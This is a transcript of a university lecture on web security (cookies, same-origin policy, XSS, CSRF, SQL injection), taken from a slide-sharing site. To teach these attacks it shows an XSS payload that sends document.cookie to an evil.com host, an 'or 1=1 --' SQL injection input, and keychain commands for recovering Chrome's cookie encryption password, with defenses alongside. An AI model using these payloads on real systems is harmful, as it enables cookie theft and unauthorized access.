Presentation is loading. Please wait.

Presentation is loading. Please wait.

Lecture 26: Web Security CS 5430 5/2/2018.

Published byMagdalene Richards Modified over 5 years ago

Similar presentations

Presentation on theme: "Lecture 26: Web Security CS 5430 5/2/2018."— Presentation transcript:

1 Lecture 26: Web Security CS /2/2018

2 2015 Security Incidents

3 Vulnerabilities by Year

4 Vulnerability Occurrence in Applications
2017: 85.9%, 21%, 25.3%, 35.9%,18.8%,1.8% (from 2018 report) 2013 2014 2015

5 Vulnerability Occurrence in Applications
2013 2014 2015

6 HTTP Basics GET /index.html HTTP/1.1 Host: www.example.com
HTTP/ OK Date: Fri, 17 March :10:00 EDT Content-Type: text/html; charset=UTF-8 Content-Length: 138 Connection: close <html> <head> <title>An Example Page</title> </head> <body> Hello World! </body> </html>

7 Session Management HTTP GET HTTP OK HTTP GET HTTP OK

8 Cookie Side-jacking SSL(login) SSL(redirect; set-cookie)
Request; cookie=SID

9 FireSheep (October 2010)

10 SSL by Default (top 10k)

11 Cookie Forgery SSL(login) SSL(redirect; set-cookie)
Request; cookie=SSID

12 Cookie Forgery in February 2017, Yahoo announced that 32 million accounts had been compromised by successful cookie forging.

13 Cookie Theft Malware sometimes targets local browser state

14 Chrome Encrypted Cookies
salt is 'saltysalt' key length is 16 iv is 16 bytes of space b' ' * 16 on Mac OSX: password is in keychain: security find-generic-password -w -s "Chrome Safe Storage" 1003 iterations on Chrome OS: password is in keychain: "security find-generic-password -wga Chrome” on Linux: password is peanuts 1 iteration On Windows: password is current user password CryptProtectData uses 4000 iterations

15 Vulnerability Occurrence in Applications
2013 2014 2015

16 HTML <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" " <html xmlns=" <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>CS 5430 Spring 2018: System Security</title> <link rel="stylesheet" href="style.css" /> <link rel="shortcut icon" href=" /> </head> <body> <div id="canvas"> <div id="header"> <div id="info"> <a href=" <span class="title">CS 5430</span><br /> <span class="subtitle">System Security</span></a> </div> <div id="logo"> <a href=" src="cslogo.png" alt="Cornell Computer Science" /></a> <!--end header--> <div style="clear:both;"></div> <div id="menu"> <ul> <li><a href="index.html">Home</a></li> <li><a href="syllabus.html">Syllabus</a></li> <li><a href="schedule.html">Schedule</a></li> <li><a href="project.html">Project</a></li> </ul>

17 Domain Object Model

18 Same Origin Policy (SOP)
Data for accessed by:

19 SOP Exceptions Domain relaxation: document.domain
Cross-origin network requests: Access-Control-Allow-Origin Cross-origin client-side communication: postMessage Importing scripts

20 Cross-Site Scripting (XSS)
Form of code injection evil.com sends victim a script that runs on example.com scripts can be imported from remote origins, have privilieges of imported page (not source)

21 Reflected XSS Attack Server visit web site 1 receive malicious link 2
send valuable data 5 3 4 click on link echo user input Victim Server

22 Reflected XSS Search field on victim.com:
Server-side implementation of search.php: <html> <title> Search Results </title> <body> Results for <?php echo $_GET[term] ?>: ...</body> </html> What if victim instead clicks on: <script> window.open(“ = ” + document.cookie ) </script>

23 Reflected XSS Attack Server user gets bad link www.evil.com
term= <script> ... </script> user clicks on link victim echoes user input Victim Server <html> Results for <script> window.open( ... document.cookie ...) </script> </html>

24 Stored XSS Attack Server steal valuable data 4 1
Inject malicious script 2 User Victim 3 request content receive malicious script Server Victim

25 Stored XSS attack vectors
loaded images HTML attributes user content (comments, blog posts)

26 Example XSS attacks

27 XSS Defenses Parameter Validation HTTP-Only Cookies
Dynamic Data Tainting Static Analysis Script Sandboxing

28 Vulnerability Occurrence in Applications
2013 2014 2015

29 Cross-Site Request Forgery (CSRF)
Server Victim establish session 1 send forged request 4 (w/ cookie) 2 3 User Victim visit server (or iframe) receive malicious page Attack Server

30 CSRF Defenses Secret Validation Token: Referrer Validation:
Custom HTTP Header: User Interaction (e.g., CAPTCHA) <input type=hidden value=23a3af01b> Referrer: X-Requested-By: XMLHttpRequest

31 Vulnerability Occurrence in Applications
2013 2014 2015

32 SQL Injection SQL Injection is another example of code injection
Adversary exploits user-controlled input to change meaning of database command

33 SQL Injection DB Enter SELECT * Username & FROM Users Web Password Web
Browser (Client) Enter Username & Password Web Server DB SELECT * FROM Users WHERE user='me' AND pwd='1234'

34 SQL Injection What if user = “ ' or 1=1 -- ” DB Enter SELECT *
Web Browser (Client) Enter Username & Password Web Server DB SELECT * FROM Users WHERE user='me' AND pwd='1234' What if user = “ ' or 1=1 -- ”

35 SQL Injection

36 SQLi in the Wild

37 Defenses Against SQL Injection
Prepared Statements: String custname = request.getParameter("customerName"); // perform input validation to detect attacks String query = "SELECT account_balance FROM user_data WHERE user_name = ? "; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery( ); Input Validation: Case statements, cast to non-string type Escape User-supplied inputs: Not recommended

38 Vulnerability Occurrence in Applications
2013 2014 2015

Download ppt "Lecture 26: Web Security CS 5430 5/2/2018."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross-site Request Forgery (CSRF) Attacks

Cross-site Request Forgery (CSRF) Attacks
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.

1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Cookies Cross site scripting

Cookies Cross site scripting
Copyright© 2002 Avaya Inc. All rights reserved Advanced Cross Site Scripting Evil XSS Anton Rager.

Copyright© 2002 Avaya Inc. All rights reserved Advanced Cross Site Scripting Evil XSS Anton Rager.
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

Similar presentations

Ads by Google